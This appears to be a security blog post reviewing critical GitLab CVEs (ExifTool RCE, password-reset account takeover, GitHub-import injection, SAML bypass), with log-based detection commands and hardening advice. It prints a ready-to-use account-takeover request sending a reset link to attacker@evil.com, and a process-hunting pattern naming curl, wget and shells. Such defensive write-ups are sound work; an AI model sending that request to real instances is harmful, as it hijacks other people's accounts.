Retour au blog
GitLabCVE-2021-22205CVE-2023-7028RCEDevOpsself-hosted

GitLab: Critical CVEs and Securing Your Self-Hosted Instance

Self-hosted GitLab concentrates critical vulnerabilities including RCE and account takeovers. Analysis of major CVEs and security best practices for your instance.

23 avril 20263 min de lecture

GitLab is the most widely deployed open-source DevOps platform in self-hosted environments. Thousands of companies host their source code, CI/CD pipelines and infrastructure secrets on internal or internet-exposed GitLab instances. Critical GitLab vulnerabilities can grant access to an organization's entire codebase and secrets.

CVE-2021-22205: Unauthenticated RCE (CVSS 10.0)

The Worst GitLab CVE in History

CVE-2021-22205 is an unauthenticated remote code execution vulnerability via ExifTool — the library used by GitLab to process image metadata from uploads.

How it works:

GitLab automatically passes every uploaded image to ExifTool to extract metadata. A vulnerability in ExifTool's DjVu file handling allows injecting arbitrary commands in the metadata, which execute with GitLab server privileges.

Image with malicious metadata → ExifTool → Command execution

Affected versions: GitLab CE/EE 11.9 through 13.10.2 (before 13.10.3)
CVSS Score: 10.0

Mass Exploitation in 2021

Despite a patch available since April 2021, a November 2021 study revealed that ~50% of GitLab instances exposed to the internet were unpatched. Tens of thousands of servers were compromised to deploy cryptocurrency miners and backdoors.

CVE-2023-7028: Zero-Click Account Takeover (CVSS 10.0)

No User Interaction Required

In January 2024, GitLab disclosed CVE-2023-7028 — a vulnerability enabling takeover of any GitLab account without user interaction.

Mechanism:

A flaw in the password reset feature allows sending the reset email to an arbitrary attacker-controlled address, simply by manipulating the email parameter in the reset request.

POST /users/password HTTP/1.1

user[email][]=victim@company.com&user[email][]=attacker@evil.com

GitLab would send the reset link to BOTH addresses — allowing the attacker to take over the account without the victim ever clicking anything.

Affected versions: GitLab CE/EE 16.1 through 16.7.1
CVSS Score: 10.0

If the compromised account has MFA enabled, account takeover alone isn't sufficient — but combined with CVE-2023-5356 (CVSS 9.6, Slack/Mattermost slash command abuse for code execution), it achieves full RCE.

CVE-2022-2884: RCE via GitHub Import (CVSS 9.9)

A flaw in GitLab's GitHub import feature allowed an authenticated user to execute code on the GitLab server. Exploited a command injection in the GitHub API parser.

CVE-2024-45409: SAML Auth Bypass (CVSS 10.0)

In September 2024, a SAML authentication bypass in the ruby-saml gem used by GitLab. Allowed authenticating as any user via a forged SAML response.

Detecting a Compromise

Logs to Monitor

# GitLab authentication logs
/var/log/gitlab/gitlab-rails/production_json.log

# Look for unusual authentications
grep "password_reset" /var/log/gitlab/gitlab-rails/production_json.log | tail -100

# Suspicious API access
grep "method.*POST.*upload" /var/log/gitlab/nginx/gitlab_access.log

IOCs for CVE-2021-22205

# Look for suspicious processes launched by the git user
ps aux | grep git | grep -E "bash|sh|curl|wget|python"

# Check git user crontabs
crontab -u git -l

# Recently modified files in GitLab directories
find /var/opt/gitlab -newer /tmp/ref_date -type f | grep -v ".log"

Securing GitLab

1. Update Regularly

GitLab frequently releases critical security patches. Enable notifications:

# Check current version
gitlab-rake gitlab:env:info | grep "GitLab"

# Update (Omnibus package)
apt-get update && apt-get install gitlab-ee
# or
yum update gitlab-ee

2. Restrict Network Access

If GitLab is self-hosted, evaluate whether it truly needs to be internet-accessible:

# Example nginx: restrict to authorized IPs
location / {
    allow 10.0.0.0/8;
    allow 192.168.0.0/16;
    deny all;
}

3. Disable Public Sign-Ups

Admin Area → Settings → General → Sign-up restrictions
→ Uncheck "Sign-up enabled"
→ Enable "Require admin approval for new sign-ups"

4. Enforce MFA

Admin Area → Settings → General → Sign-in restrictions
→ Enable "Two-factor authentication" for all users

5. Restrict External Imports

Disable GitHub/Bitbucket/etc. imports if not needed — they're an attack vector (CVE-2022-2884).

6. GitLab CI Runners: Isolate Executors

GitLab CI runners execute potentially untrusted code. Use isolated Docker executors, never Shell executor on the GitLab server itself.

Register your GitLab version in your asset inventory on cveo.tech to receive alerts as soon as a critical CVE is published.

Surveillez les CVE avec l'IA

Recherche IA, scoring CVSS, surveillance de parc et alertes automatiques.

Essayer la recherche IA →Créer un compte gratuit

Articles similaires

Comment suivre les vulnérabilités CVE de son parc informatique

Guide complet pour surveiller et gérer les CVE affectant votre parc informatique : méthodes, outils et bonnes pratiques pour les équipes IT et RSSI.

Guide du patch management : comment traiter les CVE rapidement et efficacement

Découvrez comment mettre en place un processus de patch management CVE robuste : SLA par sévérité, étapes clés, outils et erreurs à éviter pour protéger votre SI.

Les meilleurs outils CVE en 2026 : comparatif complet

Comparatif des meilleurs outils de gestion et surveillance CVE en 2026 : solutions open source, plateformes SaaS, scanners. Quel outil choisir selon votre contexte ?